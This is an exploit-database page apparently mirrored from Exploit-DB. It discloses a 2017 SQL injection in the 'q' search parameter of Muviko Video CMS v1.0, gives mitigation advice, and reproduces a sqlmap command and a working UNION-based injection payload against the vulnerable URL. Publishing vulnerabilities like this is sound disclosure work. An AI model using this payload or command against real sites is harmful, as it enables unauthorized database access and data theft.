header-logo
Suggest Exploit
vendor:
Muviko Video CMS
by:
Kaan KAMIS
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Muviko Video CMS
Affected Version From: Muviko Video CMS v1.0
Affected Version To: Muviko Video CMS v1.0
Patch Exists: NO
Related CWE:
CPE: a:muvikoscript:muviko:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2017

Muviko – Video CMS v1.0 – ‘q’ Parameter SQL Injection

The 'q' parameter in Muviko Video CMS v1.0 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries in the 'q' parameter, potentially allowing them to access, modify, or delete the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

Exploit Title: Muviko - Video CMS v1.0 – 'q' Parameter SQL Injection
Date: 02.08.2017
Vendor Homepage: https://muvikoscript.com/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview
Muviko is a movie & video content management system. 
Powerful, scalable and multi-purpose. 
It has been built from the ground up to provide users with an excellent experience. 
Uses can subscribe to watch your videos and earn you money. 
You choose which of your videos require users to subscribe, and which are free. 
You can also earn money from Ads.


Vulnerable Url: https://localhost/search.php?q=[payload]

Sqlmap Example : sqlmap.py -u "https://localhost/search.
php?q=star" --cookie="PHPSESSID=ipqrq203upp0kshdetjgn2hk12; _ga=GA1.2.1947531638
.1501703867; _gid=GA1.2.1749506565.1501703867; _gat=1"

---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: q=test' UNION ALL SELECT NULL,CONCAT(CONCAT('qqpzq','lHGBmBgXqPlXdk
uRCaimornRFWRUtWPKLWYLzQeK'),'qqvvq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL-- Gqvt
---

Navigation

Suggest Exploit

Services By CQR